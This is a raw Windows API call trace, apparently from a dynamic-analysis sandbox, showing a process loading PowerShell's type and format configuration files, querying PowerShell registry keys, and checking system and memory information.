	[0469.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0469.007] SetErrorMode (uMode=0x1) returned 0x1
	[0469.008] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0469.008] GetFileType (hFile=0x310) returned 0x1
	[0469.008] SetErrorMode (uMode=0x1) returned 0x1
	[0469.008] GetFileType (hFile=0x310) returned 0x1
	[0469.009] ReadFile (in: hFile=0x310, lpBuffer=0x2ec0cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2ec0cd0*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.012] ReadFile (in: hFile=0x310, lpBuffer=0x2ec0cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2ec0cd0*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.012] ReadFile (in: hFile=0x310, lpBuffer=0x2ec0cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2ec0cd0*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.012] ReadFile (in: hFile=0x310, lpBuffer=0x2ec0cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2ec0cd0*, lpNumberOfBytesRead=0x24d2c8*=0xcf3, lpOverlapped=0x0) returned 1
	[0469.012] ReadFile (in: hFile=0x310, lpBuffer=0x2ec012b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2ec012b*, lpNumberOfBytesRead=0x24d2c8*=0x0, lpOverlapped=0x0) returned 1
	[0469.013] ReadFile (in: hFile=0x310, lpBuffer=0x2ec0cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2ec0cd0*, lpNumberOfBytesRead=0x24d2c8*=0x0, lpOverlapped=0x0) returned 1
	[0469.015] CloseHandle (hObject=0x310) returned 1
	[0469.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0469.410] SetErrorMode (uMode=0x1) returned 0x1
	[0469.410] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d240 | out: lpFileInformation=0x24d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0469.410] SetErrorMode (uMode=0x1) returned 0x1
	[0469.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0469.412] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d328 | out: phkResult=0x24d328*=0x310) returned 0x0
	[0469.412] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d2ac, lpData=0x0, lpcbData=0x24d2a8*=0x0 | out: lpType=0x24d2ac*=0x1, lpData=0x0, lpcbData=0x24d2a8*=0x56) returned 0x0
	[0469.412] CoTaskMemAlloc (cb=0x5a) returned 0x46f2c0
	[0469.412] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d27c, lpData=0x46f2c0, lpcbData=0x24d278*=0x56 | out: lpType=0x24d27c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d278*=0x56) returned 0x0
	[0469.412] CoTaskMemFree (pv=0x46f2c0) 
	[0469.412] RegCloseKey (hKey=0x310) returned 0x0
	[0469.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0469.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0469.776] GetSystemInfo (in: lpSystemInfo=0x24bf60 | out: lpSystemInfo=0x24bf60*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0469.778] VirtualQuery (in: lpAddress=0x24c010, lpBuffer=0x24ced0, dwLength=0x30 | out: lpBuffer=0x24ced0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0469.794] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0469.794] GetFileType (hFile=0x30c) returned 0x1
	[0469.794] SetErrorMode (uMode=0x1) returned 0x1
	[0469.794] GetFileType (hFile=0x30c) returned 0x1
	[0469.794] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.794] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.794] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.795] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.795] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.795] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.795] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.795] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.795] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.796] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.796] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.797] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.797] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.797] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.797] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.798] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.798] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.799] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.799] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.799] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.800] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.800] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.800] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.800] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.801] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.801] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.801] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.801] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.802] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.802] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.802] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.802] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.802] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.805] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.805] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.805] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.805] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.806] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.806] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.806] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.806] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0469.807] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x1b4, lpOverlapped=0x0) returned 1
	[0469.807] ReadFile (in: hFile=0x30c, lpBuffer=0x2dad870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2dad870*, lpNumberOfBytesRead=0x24d2c8*=0x0, lpOverlapped=0x0) returned 1
	[0469.807] CloseHandle (hObject=0x30c) returned 1
	[0469.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0469.807] SetErrorMode (uMode=0x1) returned 0x1
	[0469.807] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d240 | out: lpFileInformation=0x24d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0469.807] SetErrorMode (uMode=0x1) returned 0x1
	[0469.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0469.808] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d328 | out: phkResult=0x24d328*=0x30c) returned 0x0
	[0469.808] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d2ac, lpData=0x0, lpcbData=0x24d2a8*=0x0 | out: lpType=0x24d2ac*=0x1, lpData=0x0, lpcbData=0x24d2a8*=0x56) returned 0x0
	[0469.808] CoTaskMemAlloc (cb=0x5a) returned 0x1b921db0
	[0469.808] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d27c, lpData=0x1b921db0, lpcbData=0x24d278*=0x56 | out: lpType=0x24d27c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d278*=0x56) returned 0x0
	[0469.808] CoTaskMemFree (pv=0x1b921db0) 
	[0469.808] RegCloseKey (hKey=0x30c) returned 0x0
	[0469.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0469.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0470.769] VirtualQuery (in: lpAddress=0x24c010, lpBuffer=0x24ced0, dwLength=0x30 | out: lpBuffer=0x24ced0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0470.800] VirtualQuery (in: lpAddress=0x24c010, lpBuffer=0x24ced0, dwLength=0x30 | out: lpBuffer=0x24ced0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0470.823] VirtualQuery (in: lpAddress=0x24c010, lpBuffer=0x24ced0, dwLength=0x30 | out: lpBuffer=0x24ced0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0472.034] VirtualQuery (in: lpAddress=0x24c010, lpBuffer=0x24ced0, dwLength=0x30 | out: lpBuffer=0x24ced0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0472.035] VirtualQuery (in: lpAddress=0x24c010, lpBuffer=0x24ced0, dwLength=0x30 | out: lpBuffer=0x24ced0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0472.039] VirtualQuery (in: lpAddress=0x24c010, lpBuffer=0x24ced0, dwLength=0x30 | out: lpBuffer=0x24ced0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0472.055] VirtualQuery (in: lpAddress=0x24c010, lpBuffer=0x24ced0, dwLength=0x30 | out: lpBuffer=0x24ced0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0473.405] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0473.405] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0473.406] CoTaskMemFree (pv=0x1b91f0b0) 
	[0473.421] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4c8 | out: phkResult=0x24d4c8*=0x30c) returned 0x0
	[0473.421] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x24d4dc, lpData=0x0, lpcbData=0x24d4d8*=0x0 | out: lpType=0x24d4dc*=0x1, lpData=0x0, lpcbData=0x24d4d8*=0x74) returned 0x0
	[0473.421] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x24d44c, lpData=0x0, lpcbData=0x24d448*=0x0 | out: lpType=0x24d44c*=0x1, lpData=0x0, lpcbData=0x24d448*=0x74) returned 0x0
	[0473.421] CoTaskMemAlloc (cb=0x78) returned 0x404320
	[0473.421] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x24d41c, lpData=0x404320, lpcbData=0x24d418*=0x74 | out: lpType=0x24d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d418*=0x74) returned 0x0
	[0473.421] CoTaskMemFree (pv=0x404320) 
	[0473.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0473.422] SetErrorMode (uMode=0x1) returned 0x1
	[0473.422] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d3a0 | out: lpFileInformation=0x24d3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0473.422] SetErrorMode (uMode=0x1) returned 0x1
	[0473.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0473.423] SetErrorMode (uMode=0x1) returned 0x1
